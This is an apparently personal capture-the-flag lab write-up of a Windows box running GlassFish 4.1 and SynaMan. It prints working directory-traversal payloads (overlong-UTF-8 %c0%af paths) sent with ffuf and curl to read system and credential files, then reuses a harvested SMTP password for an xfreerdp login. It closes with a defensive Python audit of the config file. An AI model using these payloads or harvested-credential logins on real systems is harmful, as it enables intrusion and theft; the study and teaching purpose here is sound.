## Enum

- system is running windows
- 4848/tcp - Glassfish - GlassFish Server Open Source Edition 4.1
- 8181/tcp - Glassfish
- 6060/tcp - Synametrics File Server

### 6060/tcp Synametrics File Server

- Version 5.1
- No known vulnerabilities

### 8080/TCP Glassfish - Data Web

- Appears to be a mostly static website
- Contains a contact web form
- Dir enum using [[FFUF]] reveals nothing

### 4848/TCP - Login Page

![[Pasted image 20250424111222.png]]

- default glassfish creds?
- vulnerable version?
	- copyright is very old
- seems there's a directory traversal vuln

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168]
╰─> searchsploit -m 39441
  Exploit: Oracle GlassFish Server 4.1 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/39441
     Path: /opt/exploitdb/exploits/multiple/webapps/39441.txt
    Codes: CVE-2017-1000028
 Verified: True
```

> The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated.
Directory traversal works:

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168]
╰─> ffuf -u http://$RHOST:4848/FUZZ -c -w ./dir_traversal_paths.txt -mc 200,301,302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.188.168:4848/FUZZ
 :: Wordlist         : FUZZ: ./dir_traversal_paths.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,301,302
________________________________________________

/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini [Status: 200, Size: 92, Words: 6, Lines: 8]
:: Progress: [6/6] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168]
╰─> curl http://$RHOST:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

Now the question becomes which files to target?

- The system is not exposing any SSH ports
- Perhaps some application config file?
- Where are the Glassfish admin credentials located?
- An old vulnerability in SynaMan reveals the location of a credentials file:
	- `C:\SynaMan\config\AppConfig.xml`

We can retrieve the SynaMan config:

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/fish]-[192.168.188.168]
╰─> curl http://$RHOST:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/appconfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
  <parameters>
    <parameter name="adminEmail" type="1" value="[email protected]"></parameter>
    <parameter name="smtpSecurity" type="1" value="None"></parameter>
    <parameter name="jvmPath" type="1" value="jre/bin/java"></parameter>
    <parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter>
    <parameter name="httpPortSSL" type="2" value="-1"></parameter>
    <parameter name="httpPort" type="2" value="0"></parameter>
    <parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter>
    <parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter>
    <parameter name="lastSelectedTab" type="1" value="1"></parameter>
    <parameter name="emailServerWebServicePort" type="2" value=""></parameter>
    <parameter name="imagePath" type="1" value="images/"></parameter>
    <parameter name="defaultOperation" type="1" value="frontPage"></parameter>
    <parameter name="publicIPForUrl" type="1" value=""></parameter>
    <parameter name="flags" type="2" value="2"></parameter>
    <parameter name="httpPort2" type="2" value="6060"></parameter>
    <parameter name="useUPnP" type="4" value="true"></parameter>
    <parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
    <parameter name="smtpUser" type="1" value="arthur"></parameter>
    <parameter name="InitialSetupComplete" type="4" value="true"></parameter>
    <parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
    <parameter name="failureOverHttpPort" type="2" value="55222"></parameter>
    <parameter name="smtpPort" type="2" value="25"></parameter>
    <parameter name="httpIP" type="1" value=""></parameter>
    <parameter name="emailServerWebServiceHost" type="1" value=""></parameter>
    <parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
    <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
    <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
  </parameters>
</Configuration>
```

We get:

- SMTP password: `KingOfAtlantis`
- and an admin email: `[email protected]`
- doesn't work on
	- SynaMan login
	- Glassfish Admin

Okay so had to look at the writeup here. Apparently I needed some other credentials:

- `smtpUser` = `arthur`

And I needed to use those with rdesktop. Was not aware that rdesktop was running here.

## Initial Access

We leverage the previously discovered credentials to access the target via [[RDP (Remote Desktop Protocol)]]

```
xfreerdp /u:arthur /p:KingOfAtlantis /v:192.168.188.168
```

![[Pasted image 20250424121257.png]]

## Privesc

We are immediately met with a Total AV popup stating that our licence has expired.

![[fish_writeup_AV_expired.png]]

https://www.exploit-db.com/exploits/47897

Well, found the right privesc vector here. But the fucking publishers of this machine... The free trial expired so I can't actually execute the privesc. This is so fucking dumb man....

## Lessons Learned

- Should have done service enumeration better, didn't initially realize that Synaman was running, had to look at the writeup for that one. Neither did I realize that rdesktop was running?
- In the writeup they state Synaman 5.1 is running, but the site I hit runs SynaMan 5.1...
- I don't know why Nmap didn't show me the RDP port/service?
- Got more experience with [[xfreerdp]] and created associated cheatsheet
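The AppConfig.xml retrieved above stores the SMTP password in clear text, has `disableCsrfPrevention` set to `true` and runs with no TLS listener (`httpPortSSL` is `-1`), and that SMTP password turned out to be the user's RDP password too. Added example, not from the writeup or from Synametrics: a small audit that parses that file layout and reports such settings, run here over a constructed excerpt with placeholder values.

```python
import re
import xml.etree.ElementTree as ET

# Constructed excerpt in the SynaMan AppConfig.xml layout; values are placeholders.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
  <parameters>
    <parameter name="httpPortSSL" type="2" value="-1"></parameter>
    <parameter name="httpPort" type="2" value="0"></parameter>
    <parameter name="httpPort2" type="2" value="6060"></parameter>
    <parameter name="smtpUser" type="1" value="EXAMPLE_USER"></parameter>
    <parameter name="smtpPassword" type="1" value="EXAMPLE_SECRET"></parameter>
    <parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
  </parameters>
</Configuration>"""

# Parameter names whose non-empty value is a stored credential.
SECRET_NAME = re.compile(r"passw(or)?d|secret|token|apikey", re.I)

def load_parameters(xml_text):
    """Return {name: value} for every <parameter> in the file."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value", "") for p in root.iter("parameter")}

def audit_appconfig(xml_text):
    """Return (parameter, finding) pairs for settings worth raising in a review."""
    params = load_parameters(xml_text)
    findings = []
    for name, value in params.items():
        if SECRET_NAME.search(name) and value:
            # Any clear-text secret here is readable by whoever can read the file,
            # including through a traversal bug in an unrelated service on the host.
            findings.append((name, "credential stored in clear text"))
    if params.get("disableCsrfPrevention", "").lower() == "true":
        findings.append(("disableCsrfPrevention", "CSRF protection disabled"))
    plain_ports = [params.get(k, "0") for k in ("httpPort", "httpPort2")]
    if params.get("httpPortSSL") == "-1" and any(p not in ("0", "-1", "") for p in plain_ports):
        findings.append(("httpPortSSL", "no TLS listener while a plain HTTP port is open"))
    return findings
```

The credential finding is the one that mattered on this box: a password that is reused between the SMTP relay and a domain or local account turns a config read into a login.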